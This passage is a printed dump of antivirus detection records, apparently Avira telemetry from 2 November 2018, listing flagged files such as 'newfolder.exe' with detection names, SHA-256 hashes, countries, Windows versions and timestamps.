  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:09Z'), dt=datetime.date(2018, 11, 2)),
  ...],
 [Row(detection=Row(filename='avscan-20181102-054509-6dbec548', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054509-6DBEC548', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053935-a6b28592', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053935-A6B28592', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054758-d2b1c065', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054758-D2B1C065', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053933-a5bba726', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053933-A5BBA726', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052811-0f5b2146', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052811-0F5B2146', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060120-b0af288a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060120-B0AF288A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:19Z'), dt=datetime.date(2018, 11, 2)),
